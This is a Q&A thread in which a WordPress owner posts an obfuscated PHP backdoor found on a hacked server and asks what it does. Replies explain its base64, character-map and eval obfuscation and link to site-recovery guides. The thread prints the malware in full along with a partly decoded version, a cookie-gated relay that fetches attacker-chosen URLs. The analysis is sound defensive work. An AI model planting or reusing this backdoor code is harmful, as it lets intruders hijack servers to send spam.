# PHP script sending spam mail

Tags: php, wordpress, security, obfuscation, spam

I'm running a wordpress on my ubuntu server. Recently, I found that it is hacked and sending a lot of spam from my server. I found the below weird script in my wordpress directory. Does anyone know what is it doing? And how to reverse the obfuscation and see the original code?

```
<?php
 $fodhaow = 2570; function iytpmqplaf($jtsqp, $paicjek){$nuodxnxumv = ''; for($i=0; $i < strlen($jtsqp); $i++){$nuodxnxumv .= isset($paicjek[$jtsqp[$i]]) ? $paicjek[$jtsqp[$i]] : $jtsqp[$i];}
$itbenabk="base" . "64_decode";return $itbenabk($nuodxnxumv);}
$uhzwglv = 'RrqBxzCyDeRfd1aNuGc58eqMDedPlGdydPmm2Q5vAEcNl0qMu1zi2A75l17MD'.
'edPlGdydPmm2Q5vAEcqu9dguqCPDecgu9aNl0ufoAE3pRNhu1zieGaNlwzMlrqXxeRfoAE3pRN'.
'hxw7BlGdqeGzyDedM8wdgu9RfoZE3pRNhxwFNeGvq7AV9lwHne1znDwvI7rqglqCixwIqd'.
'Pmm2Q5vAVi2D0CPDwHLxAhfdHCpQiCbZYYV8eoVdrqiDwiNpRN3pRfVTAhVxw8V2Aa'.
'N7rzXTAUCTAdEDp7EoQumoPiF8QTibQRyvLTX6poFv4IqDwRioQc46pHEvQV42Ri2TAhVTAhVTAcqKrqi2AE3pRNCpRfvA4aE8e'.
'aSTpiVD0q5DzC9DeaM81CB7rzB7tofdGcfupfgb1qButzidPE3pRfEDrHi8ZhCTtvmlrqi2ATCT4mEDrHi8ZmP2Q5vAVi2drT1'.
'vHCEDwvgDrzMDrHi8ZhCTrdSu1Y1vHCEDwvgDrYf7ed5DrzLl1aq2AaE8ea'.
'SwyH72ZE3pRfvA4ayDwFEe1aS7rUVsZcIl9vqu0qSlrqkDZSEDwvPKeci2Aa4vLaMDrzLl1a'.
'qe1aS7rUN2Q5vAVi2dtdquGz57AhCTtvql0aMDrHi8QUV2AayDwFEe1aS7rUN6mi2pRNND4hfTZaPDe'.
'vIltRNpRN3pRfVTAhVdtdquGz57AhCTtvql0aMDrHi8QTfdtvql0aMDrHi8ZE3pRNCpRfvA0zLxrJVd'.
'tdquGz57p5vAVi2D9zB8GaNl1nVDrzLu9qm7AVEDrHi8ZEvA95vA4hV'.
'TAhElGzie1aS7rUVsZh4TL5vA4hVTAhEx1zFTpiVdHCQazdwazdldiSYzHcMZUCQzA77TAnVdHCQazdwazdldIdH'.
'YzzHYIaMzzdddIi3pRfVTAhVdrXqKzC5DwnVsZcy7td5DwnfdrXqKZE3pRfVpRfVTAhVD0CPTAVExQim'.
'6PhExZhJTtviu0Oql4VEx1zF2Q5VdrEW2PEvA4hVTAc3pRfVTAhVTAhVTAaWDeql'.
'drq7TpiV81SP2rCPDAVEx1zFwPaNeZEVe4hfdrXqKzC5DwnVdZhPvQYN2Q5vA4hVTAcCpRfvA4hVTAc0lGTV2AaNs'.
'Qh3TAaNstviu0Oql4VEDrHi8ZE32Ri2TAhVTt5vA4hVTAhVTAhVD0CPTAVExLi'.
'm6PhExLOy7td5DwnfdrXqKZEVd48VdrEJuGaPlrzB2AaE8eaS2Q5VdrfW2PmVdrEW2PE'.
'vA4hVTAhVTAhVKmi2TAhVTAhVTAhVTAhVdrCI7HCE8eaSTAnCTrvfu4Sgu0RfdraS7'.
'rHldrq72ZcKTrCPDAVEx1zFwPajeZEN6mi2TAhVTAhVTAcCpRfVTAhVMRi2pRfVTAhVu0zi7edBTAag7eaMDrHi8Q5vA9ivAV'.
'i2D9zB8GaNl1nVu1zBDHCE8eaSoZVEDrHi8ZEvA95vA4hVTAhExrzSDAhCTAT46m'.
'i2pRfVTAhVD0CPDwHLxAVEDrHi8z54xrzSDrzPuPd7TrHyTAaWDeECs4a18wOIDZEvA4hVTAc'.
'3pRfVTAhVTAhVTAafDwHETAnCTAaWDeEVb4h464h4TAnVdtDSltz'.
'qTAnVTqOPern46mi2TAhVTtivAVi2TAhVTAam8edSleoVsZcSu9dSKZV9xtaiuAuVsQn'.
'V8edP8eEfpRfVTAhVTAhVTA7XDeafl1R9Tpi+TAaE8eaSwPdXDeafl1R4eZmvA4hVTAhVTAhVd1Sq'.
'8waqu4uVsQnVdrSq8wR5pRfVTAhVTAhVTA7Ll1FiDwFidPhCs4hEDrHi8'.
'z5480CEKZd7bhi2TAhVTAhVTAh97rqXDwCI7AuVsQnVdraS7rHlT9aNlwzg7eR4eZmvA4hVTAhVTAhVpRfVTAh'.
'V2ZE3pRfvA4hVTAhE8GanTpiVuGaPDwHXe1vgl9aqKtaM8Gdq8eaq2Aam8edSleoN6mi2TAhVThi2TAh'.
'VTAaPDevIltRVsZchD0q5DzC9DeaM81CB7rzB7tofdraS7rHlT9zPlAd7bAcrRYOQaZmVdrviKAE3pRfvA4hVTAcND4hfdrSi'.
'7tcMu0zyurCBu1zMxrzSDrzP2Ri2TAhVTt5vA4hVTAhVTAhVxw8V2tviu9cguPVExtaiuHCPDevml1FyDzCfDw'.
'HEDedloHi5TATPoph42ZhCsQiVaEHoYiYNpRfVTAhVTAhVTt5vA4hVTAhVTAhVTAhVTAaPDevIltRVsZh4ZHaYYHCHYqdsYqO'.
'iT4hBTAaf7tameGdquGcgl9vqe1Sq8waquq5meQ5vA4hVTAhVTAhVMRi2TAhVTtivA4hVTAcq'.
'ltvqpRfVTAhVKmi2TAhVTAhVTAhEu0zy7wOiTpiVTEvsQEFHRIadQiFMazdZQIT46mi2TAhVTtivAVi2TAhV'.
'Ttdq7tzPl4hEu0zy7wOi6mi2MRi2pRN07wFL7rqgl4cyDwFEe1aS7rUP2AaE8'.
'eaS2Ri2Kmi2TAhVTAJgTtzyDZcyl1vWDeaypRNC';
$tedsroi = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
eval/*o*/(iytpmqplaf($uhzwglv, $tedsroi));?>
```

I finally get the decoded script as below. But there is a line has syntax error. And there is a function "send_data1" which has not been defined. I wonder how this script works.

```
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time', 0);

foreach ($_COOKIE as $item) {
    if ($item != "dd7d1703-9a24-4362-8396-eed410b81d58")
        exit();
}

$data = file_get_contents('php://input');
$data = split("=", $data, 2);
$b64_decode_data = base64_decode(urldecode($data[1]));
$send_data = unserialize(decrypt($b64_decode_data));

$result = send_data1($send_data);

if (!$result) {
    $result = send_data2($send_data);
}

echo $result;

function decrypt($data) {
    $out_data = "";
    $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    $key_len = strlen($key);
    for ($i = 0; $i < strlen($key); $i++) {
        $key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
    }

    for ($i = 0; $i$value;) { // this line has error
        $head .= $key . ": " . $value . "\r\n";
    }

    $params = array(
        'http' => array(
            'method' => $data["method"],
            'header' => $head,
            'content' => $data["body"],
            'timeout' => $data["timeout"],
        )
    );

    $ctx = stream_context_create($params);
    $result = @file_get_contents($data["url"], FALSE, $ctx);
    if ($http_response_header) {
        if (strpos($http_response_header[0], "200") === FALSE) {
            $result = "HTTP_ERROR\t" . $http_response_header[0];
        }
    } else {
        $result = "CONNECTION_ERROR";
    } return $result;
}

function send_data2($data) {

}
```

Comment: It's just base 64 encoded.  You would just need to step through the code (Stopping short of the `eval`) and see what things base 64 decode to.  finding out is pointless, to be honest.  Clean up your hack, and focus on *how this got on your server*.  I'm guessing you've got weak security somewhere (weak passwords for either your server or your WP site, weak file permissions, etc).

Answer (score 3, accepted):

The good old script kiddy like base64 stuff.

What happens is the following:

**First of all** there is an `eval()` which evaluates a string as PHP code. To avoid finding `eval(` strings within your code base, a `/*0*/` comment was put in. The function `iytpmqplaf()` provides the PHP code to be executed.

**Secondly**, there is this variable `$itbenabk` which contains "base64_decode". Again, to avoid finding `base64_encode` strings within the code base, the string was concatenated from two strings.

**Thirdly**, the `$itbenabk` variable gets invoked. PHP realizes that `$itbenabk` contains a string name of an existing function, namely `base64_decode()`, and thus invokes it. The string in `$uhzwglv` contains the actual PHP code.

The actual base64 string was also a bit modified by a simple char to char map. To see the actual code, you can do:

```
$char2char = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
$b64code = ''; 
for($i=0; $i < strlen($uhzwglv); $i++){
    $b64code .= isset($char2char[$uhzwglv[$i]]) 
                   ? $char2char[$uhzwglv[$i]] : $uhzwglv[$i];
} 
echo base64_decode($b64code);
```

Answer (score 2):

You can unobfuscate the code, but it doesn't really matter. You should be more concerned with finding and closing the security issue.

Best thing to do is carefully follow [FAQ My site was hacked - WordPress Codex.](https://codex.wordpress.org/FAQ_My_site_was_hacked)

Then take a look at the recommended security measures in [Hardening WordPress - WordPress Codex](https://codex.wordpress.org/Hardening_WordPress) and [Brute Force Attacks - WordPress Codex](http://codex.wordpress.org/Brute_Force_Attacks)